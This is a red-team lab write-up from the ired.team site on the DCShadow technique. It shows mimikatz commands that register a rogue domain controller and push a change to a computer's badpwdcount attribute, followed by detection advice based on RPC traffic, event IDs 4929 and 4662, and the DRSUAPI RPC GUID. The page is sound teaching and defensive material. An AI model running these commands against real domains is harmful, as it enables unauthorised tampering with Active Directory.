Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
From Domain Admin to Enterprise Admin
Kerberoasting
Kerberos: Golden Tickets
Kerberos: Silver Tickets
AS-REP Roasting
Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled
Kerberos Unconstrained Delegation
Kerberos Constrained Delegation
Kerberos Resource-based Constrained Delegation: Computer Object Take Over
Domain Compromise via DC Print Server and Kerberos Delegation
DCShadow - Becoming a Rogue Domain Controller
DCSync: Dump Password Hashes from Domain Controller
PowerView: Active Directory Enumeration
Abusing Active Directory ACLs/ACEs
Privileged Accounts and Token Privileges
From DnsAdmins to SYSTEM to Domain Compromise
Pass the Hash with Machine$ Accounts
BloodHound with Kali Linux: 101
Backdooring AdminSDHolder for Persistence
Active Directory Enumeration with AD Module without RSAT or Admin Privileges
Enumerating AD Object Permissions with dsacls
Active Directory Password Spraying
Active Directory Lab with Hyper-V and PowerShell
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows / OS Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

DCShadow - Becoming a Rogue Domain Controller

DCShadow allows an attacker with enough privileges to create a rogue Domain Controller and push changes to the DC Active Directory objects.

Execution

For this lab, two shells are required - one running with SYSTEM privileges and another one with privileges of a domain member that is in Domain admins group:

In this lab, I will be trying to update the AD object of a computer pc-w10$. A quick way to see some of its associated properties can be achieved with the following powershell:

PS c:\> ([adsisearcher]"(&(objectCategory=Computer)(name=pc-w10))").Findall().Properties

Note the badpwcount property which we will try to change with DCShadow by setting the value to 9999:

[email protected]/SYSTEM console
mimikatz # lsadump::dcshadow /object:pc-w10$ /attribute:badpwdcount /value=9999

We can now push the change to the primary Domain Controller DC-MANTVYDAS:

[email protected] Admin console
lsadump::dcshadow /push

Below are the screenshots of the above commands and their outputs as well as the end result, indicating the badpwcountvalue getting changed to 9999:

Observations

As suggested by Vincent Le Toux who co-presented the DCShadow, in order to detect this type of rogue activity, you could monitor the network traffic and suspect any non-DC hosts (our case it is the PC-W10$ with 10.0.0.7) issuing RCP requests to DCs (our case DC-MANTVYDAS with 10.0.0.6) as seen below:

Same for the logs, if you see a non-DC host causing the DC to log a 4929 event (Detailed Directory Service Replication), you may want to investigate what else is happening on that system:

Current implementation of DCShadow in mimikatz creates a new DC and deletes its associated objects when the push is complete in a short time span and this pattern could potentially be used to trigger an alert, since creation of a new DC, related object modifications and their deletion all happening in 1-2 seconds time frame sound anomalous. Events 4662 may be helpful for identifying this:

Per Luc Delsalle's post on DCShadow explanation, one other suggestion for detecting rogue DCs is the idea that the computers that expose an RPC service with a GUID of E3514235–4B06–11D1-AB04–00C04FC2DCD2, but do not belong to a Domain Controllers Organizational Unit, should be investigated.

We see that our suspicious computer exposes that exact service:

..but does not belong to a Domain Controllers OU:

([adsisearcher]"(&(objectCategory=computer)(name=pc-w10))").Findall().Properties.distinguishedname
# or
(Get-ADComputer pc-w10).DistinguishedName
Outputs for computer NOT belonging to DC OU and one belonging, respecitvely

References

Below are the resources related to DCShadow attack. Note that there is also a link to youtube by a security company Alsid, showing how to dynamically detect DCShadow, so please watch it.

Dynamic Detection of DCShadow
Previous
Domain Compromise via DC Print Server and Kerberos Delegation
Next
DCSync: Dump Password Hashes from Domain Controller
Last updated 2 years ago
Contents
Execution
Observations
References